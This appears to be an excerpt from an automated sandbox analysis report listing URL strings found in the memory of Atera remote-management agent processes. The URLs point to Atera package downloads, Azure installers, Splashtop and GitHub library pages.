                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C4E1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/dahlbyk/posh-git/blob/1941da2472eb668cde2d6a5fc921d5043a024386/LICENSE.txt
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dgalbraith/chocolatey-packages/tree/master/automatic/ant
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/downloads/spraints/git-tfs/GitTfs-0.11.0.zip
                                Source: AteraAgent.exe, 00000010.00000002.2532683015.000002BEFC122000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                                Source: AgentPackageInternalPoller.exe, 00000039.00000002.2751650874.000001AA64032000.00000002.00000001.01000000.00000039.sdmpString found in binary or memory: https://github.com/lextudio/sharpsnmplib.git
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: https://github.com/majkinetor/au-packages/commit/bf95d56fe5851ee2e4f6f15f79c1a2877a7950a1
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/majkinetor/au/blob/master/README.md).
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mimecuvalo/firessh
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Configuration-file#variables
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Layout-Renderers
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/NLog/wiki/Targets
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/nlog/nlog/wiki/Configuration-file
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://monitor.azure.com//.default
                                Source: AgentPackageSTRemote.exe, 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.splashtop.com
                                Source: AgentPackageSTRemote.exe, 00000023.00000000.2256494928.0000015420AA2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://my.splashtop.com/csrs/win
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2378384520.000001D73B958000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: https://nlog-project.org/
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF00136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net
                                Source: AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/BitDefender/rmm.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF0011D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF0011D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MSI/1.8.7.2/Setupx64.msi
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MacAgent/1.0/AteraAgentInstaller.pkgA/
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric5Get
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48036000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2824739173.000001FC60A02000.00000002.00000001.01000000.00000042.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/p
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC4821A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC482B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/pcq
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/a
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/ag
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAg
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAge
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.z
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.6/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.6/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.9/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.3/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/30.2/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageProgramManagement/26.5/AgentPackageProgramManageme
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesne
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.9/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.9/Agent.Package.Watchdog.zip?Y2EPV0
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?Y2EPV0xXBZ
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/38.3/AgentPackageAgentInformati
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zipPT
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip?Y2EP
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip?Y2EPV
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/30.2/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.5/AgentPackageProgramMana
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.5/AgentPackageProgramManage
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip?Y2EPV0xXB
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.11/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.11/AgentPackageSystemTools.zip?Y2
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.2/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip?Y
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageOsUpdates/1.0/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageProgramManagement/15.5/AgentPackageProgramManageme
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Mac/
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000000.2572010406.000001AF6AAB2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Windows/
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3068186659.00000277DFBB2000.00000002.00000001.01000000.0000004A.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkg
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX
